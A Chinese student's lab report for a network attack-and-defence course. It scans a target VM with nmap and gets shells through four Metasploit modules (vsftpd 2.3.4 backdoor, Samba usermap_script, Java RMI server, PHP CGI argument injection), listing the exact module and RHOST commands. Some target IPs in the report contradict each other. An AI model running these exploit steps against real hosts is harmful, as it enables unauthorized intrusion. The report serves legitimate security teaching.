20222314 2024-2025-1 《网络与系统攻防技术》 实验六实验报告
1.实验内容
1.1 实验要求
(1)掌握metasploit、nmap的用法。
(2)学习前期渗透的方法。
(3)利用4个漏洞,实现对靶机的攻击。
1.2 学习内容
(1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。
(2)四种漏洞的原理。
a.Vsftpd源码包后门漏洞:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
b.SambaMS-RPC Shell命令注入漏洞:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
c.Java RMI SERVER命令执行漏洞:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
d.PHP CGI参数执行注入漏洞:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
2.实验过程
攻击机ip:61.139.2.128
靶机ip:61.139.2.131
2.1前期渗透
ping 61.139.2.131
靶机存活
在命令行中输入
nmap -p 1-2048 61.139.2.131
查看靶机开放的端口。
继续在命令行中输入
nmap -script=vuln 61.139.2.131
对靶机的漏洞进行扫描。截取一部分的结果,发现21端口有vsFTPd漏洞,1099端口有RMI registry default configuration remote code execution漏洞,并且大部分端口都开放着,说明这个靶机被设置得非常不安全,有很多漏洞。
2.2 Vsftpd源码包后门漏洞(21端口)
进入msfconsole后输入如下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 61.139.2.131
run
再输入命令
ls /
可以看到已经获取靶机的shell,攻击成功。
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
进入msfconsole后输入如下命令。
use exploit/multi/samba/usermap_script
set RHOST 161.139.2.131
exploit
再输入whoami ls /命令,可以看到成功获取到靶机的shell,攻击成功。
2.4 Java RMI SERVER命令执行漏洞(1099端口)
在前期渗透中已经知道1099端口开放,可以利用该端口漏洞攻击,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 61.139.2.131
exploit
输入命令ls(显示当前登录用户的用户名),可以看到输出攻击成功。
2.5 PHP CGI参数执行注入漏洞(80端口)
同上,在前期渗透在中知道80端口开放,可以利用该端口的漏洞攻击,在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.147.146
exploit
shell
可以看到能够执行pwd命令,说明攻击成功。
3.问题及解决方案
无
4.学习感悟、思考等
在本次实验中,我深刻体会到了熟练掌握和合理利用网络工具的重要性,尤其是Metasploit和Nmap在信息收集阶段的强大功能。这些工具在端口扫描、漏洞检测等前期工作中发挥了至关重要的作用,为后续的安全测试提供了准确的数据支持。通过实际操作,我学会了如何根据不同的漏洞类型选择对应的攻击模块进行测试,并对漏洞的成因及利用方式有了更深的理解。
此外,本次实验也让我意识到网络安全防护的重要性。在当前复杂多变的互联网环境中,各类潜在的网络威胁无处不在。只有加强防护意识,合理利用网络探测与攻击工具,结合适当的防护软件和策略,才能有效应对这些挑战,保护信息安全。实验不仅提升了我对网络安全攻防技术的实践能力,也进一步加深了我对网络安全防护理念的理解。